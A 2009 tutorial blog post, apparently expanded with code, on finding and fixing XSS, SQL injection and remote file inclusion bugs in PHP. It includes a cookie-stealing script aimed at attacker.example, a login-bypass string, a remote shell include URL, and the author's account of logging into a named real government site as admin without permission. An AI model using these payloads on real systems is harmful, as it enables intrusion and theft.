Tuesday, 15 September 2009

PHP SECURITY: CHECKING YOUR PHP SCRIPT FOR BUGS


Once the PHP script we wrote is finished, there are times when unwanted bugs lurk in the corners of a script that is about to go online. Such a bug can be fatal, because an intruder can exploit it with automated tools that attack the system.

And who can be sure that the PHP script they have written is free of security vulnerabilities? :D

So how do you stop hackers from exploiting, or even defacing, your website? How do you find out for certain whether the script you have written has a fatal bug, and how do you handle all of this? :D

Before moving on to the next step, it is a good idea to get to know the bugs that are most often exploited.

The author will try to explain the bugs most often found in web-based applications, in particular Content Management Systems. Among them:

- XSS (Cross Site Scripting)
- SQL Injection
- RFI (Remote File Inclusion)

Cross Site Scripting
Better known as XSS. This bug occurs because user input is put back into the page without filtering or encoding the HTML and JavaScript it may contain.

Basically the defacement (content change) happens only on the client side, in the victim's browser; the content on the server is untouched. The most dangerous part of this bug is that the injected script can steal the victim's cookies, which the attacker then uses to take over the victim's session and do something like ... :D
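As an added illustration (not code from the original post), here is a minimal reflected XSS bug in PHP beside the fixed version. The name parameter, the attacker host and the cookie-stealing payload are constructed for the example:

```php
<?php
// Added example (not code from the original post): a reflected XSS bug and
// its fix. The "name" parameter, the attacker host and the payload are
// constructed for the illustration.

// Vulnerable: the parameter goes into the page as-is, so any HTML or
// <script> it contains is rendered and executed by the visitor's browser.
function greet_unsafe(string $name): string
{
    return '<p>Hello, ' . $name . '</p>';
}

// Hardened: encode for the HTML context at the point of output. ENT_QUOTES
// also encodes ', so the same function is safe inside single-quoted
// attributes; ENT_SUBSTITUTE keeps invalid UTF-8 from blanking the output.
function greet_safe(string $name): string
{
    return '<p>Hello, ' . htmlspecialchars($name, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') . '</p>';
}

// Defence in depth: a session cookie flagged HttpOnly is not readable from
// document.cookie, so this particular payload gets nothing even if the
// encoding is forgotten somewhere. Must be set before session_start().
ini_set('session.cookie_httponly', '1');

// Constructed payload: what an attacker would put in ?name=
$payload = '<script>new Image().src="http://attacker.example/c?"+document.cookie</script>';

echo greet_unsafe($payload), PHP_EOL;
// the <script> tag reaches the browser intact and runs in this site's origin
echo greet_safe($payload), PHP_EOL;
// &lt;script&gt;... is displayed as text; nothing executes
```

The important detail is that the encoding happens where the value is written into HTML, not where it is read from the request: the same value may be needed raw elsewhere (in a log, in a database), and encoding is specific to the output context.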

Example:
Censored [sorry]

SQL Injection
SQL Injection happens when an attacker inserts SQL syntax into a query through a form field or through the URL in the browser's address bar. For example, the author tried to log in as admin on the South Sumatra government site (http://www.sumsel.go.id). Using the input ' or 1=1 -- the author logged in successfully. The single quote closes the string literal the application built around the input, or 1=1 makes the WHERE condition true for every row, and -- turns the rest of the original query into a comment. The query now behaves like a plain "select *" over the user table with no real condition, the application takes the first row returned, and the author was logged in as admin.
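To make the mechanism concrete, here is an added example (not the author's code, and not the sumsel.go.id script) that replays the ' or 1=1 -- payload against a throwaway SQLite database through PDO, next to the prepared-statement version that is immune. It assumes PHP with the pdo_sqlite extension; the users table and credentials are constructed:

```php
<?php
// Added example (not the author's code, and not the sumsel.go.id script):
// replays the ' or 1=1 -- payload against a throwaway SQLite database via
// PDO. Assumes the pdo_sqlite extension; the users table and credentials
// are constructed. Passwords are stored in clear text only to keep the
// example short; a real application stores password_hash() output and
// checks it with password_verify() after fetching the row by username.

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT, role TEXT)');
$db->exec("INSERT INTO users (username, password, role) VALUES ('admin', 's3cret', 'admin'), ('bob', 'hunter2', 'user')");

// Vulnerable: the form values are glued into the SQL text, so a quote in the
// input ends the string literal and the rest of the input is parsed as SQL.
function login_unsafe(PDO $db, string $user, string $pass): ?array
{
    $sql = "SELECT * FROM users WHERE username = '$user' AND password = '$pass'";
    $row = $db->query($sql)->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Hardened: a prepared statement sends the SQL and the values separately;
// the input can only ever be compared as data, never parsed as SQL.
function login_safe(PDO $db, string $user, string $pass): ?array
{
    $stmt = $db->prepare('SELECT * FROM users WHERE username = ? AND password = ?');
    $stmt->execute([$user, $pass]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// The payload from the post, entered in the password field. The trailing
// space matters on MySQL, where "--" only starts a comment when followed by
// whitespace; SQLite does not care.
$payload = "' or 1=1 -- ";

// The unsafe query becomes:
//   SELECT * FROM users WHERE username = 'x' AND password = '' or 1=1 -- '
// AND binds tighter than OR, so the condition is (false) OR 1=1: true for
// every row. The comment swallows the dangling quote, and the application
// takes the first row returned, which here is the admin account.
$row = login_unsafe($db, 'x', $payload);
echo 'unsafe: ', $row ? "logged in as {$row['username']} ({$row['role']})" : 'rejected', PHP_EOL;

$row = login_safe($db, 'x', $payload);
echo 'safe:   ', $row ? "logged in as {$row['username']}" : 'rejected', PHP_EOL;
```

Note that the username does not even have to be right: the OR applies to the whole condition, so whichever row the database returns first becomes the logged-in account.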

Below is a screenshot the author captured after logging in as admin on http://www.sumsel.go.id

The screenshot was taken before the author emailed the webmaster so that they could patch their PHP script.

RFI (Remote File Inclusion)
Before reading this section, please read up on the functions require, require_once, include and include_once. An RFI bug arises when a programmer passes a variable to one of these functions. If a user can put the URL of their malicious script into that variable, the malicious script is fetched and executed remotely; in other words, the attacker can run commands on your server to change the site's content or even destroy it. :D (Fetching a remote URL through include() needs allow_url_include=On, which has been Off by default since PHP 5.2; with it Off the same code still lets an attacker include arbitrary local files, so it must be fixed either way.)
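Here is an added example (not from the original post) of the include() pattern that causes RFI, beside an allow-list replacement that never lets the request name a file. The "page" parameter, the page names and the templates/ directory are assumptions for the illustration:

```php
<?php
// Added example (not from the original post): the include() pattern that
// causes RFI, and an allow-list replacement. The "page" parameter, the page
// names and the templates/ directory are assumptions for the illustration.

// Vulnerable: the request parameter names the file that include() loads.
// With allow_url_include=On, ?page=http://attacker.example/shell.txt makes
// the server fetch and execute the attacker's PHP. With it Off the same code
// is still a local file inclusion bug (?page=../../../../etc/passwd).
function render_unsafe(string $page): void
{
    include($page);
}

// Hardened: user input only selects a key; the file names are fixed here.
const ALLOWED_PAGES = [
    'home'    => __DIR__ . '/templates/home.php',
    'about'   => __DIR__ . '/templates/about.php',
    'contact' => __DIR__ . '/templates/contact.php',
];

// Returns the file to include, or null when the request is not on the list.
function resolve_page(string $page): ?string
{
    return ALLOWED_PAGES[$page] ?? null;
}

function render_safe(string $page): void
{
    $file = resolve_page($page);
    if ($file === null) {
        http_response_code(404);
        echo 'Unknown page';
        return;
    }
    include($file);
}

// Defence in depth, in php.ini: allow_url_include = Off (the default since
// PHP 5.2) and, unless the application needs it, allow_url_fopen = Off.

// Constructed attacker inputs; none of them reaches include() in the safe version.
foreach (['http://attacker.example/shell.txt', '../../../../etc/passwd', 'about'] as $input) {
    $file = resolve_page($input);
    echo $input, ' => ', $file === null ? 'rejected' : $file, PHP_EOL;
}
```

Sanitising the string (stripping "http://" or "../") is the wrong fix: the list of encodings and bypasses is long, while an allow-list of known files has nothing to bypass.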

For examples, have a look at www.milw0rm.com :D

The keyword is Remote File Inclusion. :D

Checking for Bugs
Checking for bugs can be done by hand. Hmmm ... that of course takes a lot of time. There are tools that quickly and automatically find bugs that got into a PHP script, whether by accident or on purpose. :D

Basically bug checking can be done online or offline. The author suggests doing it only on your localhost (offline).

Checking for XSS Bugs
The tool for checking your own PHP script for XSS is a Mozilla Firefox add-on (XSS Me) that is available for free. Installing it is easy.

These tools can be downloaded here:
http://www.securitycompass.com/exploit_me/xssme/xssme-0.2.1.xpi

Checking for SQL Injection Bugs
At the moment SQL Injection ranks as the favourite defacement technique and is certainly the most widely used, probably because the attack is fairly easy to carry out: basic knowledge of SQL syntax is enough. Once again a fairly powerful and easy-to-use Mozilla Firefox add-on (SQL Inject Me) is available for checking for SQL injection bugs. :D

You can download it here:
http://www.securitycompass.com/exploit_me/sqlime/sqlime-0.2.xpi

Using it is not difficult.

Checking for Remote File Inclusion Bugs
First download the script here: http://www.newhack.org/dl_jump.php?id
Then download ActivePerl, the Perl interpreter that will be used to run the inclusionscanner.pl script.
Then copy inclusionscanner.pl into the directory c:\perl\bin

The next steps:

1. Put the PHP script you want to scan into a directory under c:\perl.

   e.g. c:\perl\wp

2. Open a command prompt: Start | Run | cmd | Enter

3. Change into the directory c:\perl\bin: cd c:\perl\bin

4. Run the script:

C:\Perl\bin> perl.exe inclusionscanner.pl

# Will check a directory for all includes and unsets
# Coded by Ironfist (ironsecurity.nl)
# Usage: Create a folder in your perl folder and put the files to be scanned in it,
#        next type the folder name below (eg myfolder)
# Gives errors when checking subfolders: ignore them :)

Directory to read? c:\perl\wp

Then view the results in c:\perl\bin\result.html

Here are the scan results when the author checked WordPress 2.3.3 for inclusions:

FOUND: require_once($locale_file); in c:\perl\wp/wp-settings.php
FOUND: require_once($import_root . '/' . $file); in c:\perl\wp/wp-admin/import.php
FOUND: include_once($this->PluginDir . "class-smtp.php"); in c:\perl\wp/wp-includes/class-phpmailer.php
FOUND: include($lang_path . 'phpmailer.lang-' . $lang_type . '.php'); in c:\perl\wp/wp-includes/class-phpmailer.php
FOUND: include($lang_path . 'phpmailer.lang-en.php'); in c:\perl\wp/wp-includes/class-phpmailer.php
FOUND: include($template); in c:\perl\wp/wp-includes/template-loader.php (13 occurrences)
FOUND: require_once($_template_file); in c:\perl\wp/wp-includes/theme.php

Wow! :D Now go and patch the exploitable ones in your own script. Keep in mind that the scanner only reports include/require calls whose argument is a variable; it does not know where that variable comes from. Trace each hit back: it is exploitable only if a user-supplied value (GET, POST, cookie, or something derived from them) can reach the variable without being restricted to a known file. The WordPress hits above are fed from internal code rather than straight from the request, so they are candidates to review, not confirmed bugs.
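For readers who would rather not install ActivePerl, here is an added PHP re-implementation of the same idea. It is not the Ironfist tool and does not reproduce its output format; it walks a directory, reports every include/require whose argument contains a variable, and additionally marks the hits where a superglobal such as $_GET appears directly in the argument. The regular expressions and the DIRECT/REVIEW labels are assumptions made for this example:

```php
<?php
// Added example (not the original post's Perl tool): a small include/require
// scanner in PHP. Like inclusionscanner.pl it is a text search, so it will
// also match text inside comments and strings. Statements split across
// several lines are not matched. Usage: php scan.php c:\perl\wp

// Scan one file; returns a list of hits, each a small associative array.
function scan_file(string $path): array
{
    $hits = [];
    $lines = file($path, FILE_IGNORE_NEW_LINES);
    if ($lines === false) {
        return $hits;
    }
    // include/require keyword, optional parentheses, argument up to the ";"
    $re = '/\b(include|include_once|require|require_once)\b\s*\(?\s*(.*?)\)?\s*;/';
    foreach ($lines as $i => $line) {
        if (!preg_match($re, $line, $m)) {
            continue;
        }
        $arg = $m[2];
        if (strpos($arg, '$') === false) {
            continue; // constant path such as require_once('config.php'): not interesting
        }
        // DIRECT: request data is used in the argument without any intermediate
        // variable. Everything else is REVIEW: trace the variable by hand.
        $direct = preg_match('/\$_(GET|POST|REQUEST|COOKIE|SERVER)\b/', $arg) === 1;
        $hits[] = [
            'file'   => $path,
            'line'   => $i + 1,
            'stmt'   => trim($m[0]),
            'direct' => $direct,
        ];
    }
    return $hits;
}

// Recursively scan every *.php file below $dir.
function scan_dir(string $dir): array
{
    $hits = [];
    $it = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($dir, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($it as $f) {
        if ($f->isFile() && strtolower($f->getExtension()) === 'php') {
            $hits = array_merge($hits, scan_file($f->getPathname()));
        }
    }
    return $hits;
}

$dir = $argv[1] ?? '.';
foreach (scan_dir($dir) as $h) {
    printf("%s %s:%d  %s\n", $h['direct'] ? 'DIRECT' : 'REVIEW', $h['file'], $h['line'], $h['stmt']);
}
```

A REVIEW hit is not a clean bill of health: `$page = $_GET['p']; include($page);` is flagged REVIEW, not DIRECT, because the superglobal is on a different line. The label only tells you where to start reading.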

Remember: do no damage and do not vandalise. If you find bugs on other sites, as I mentioned above, please let the
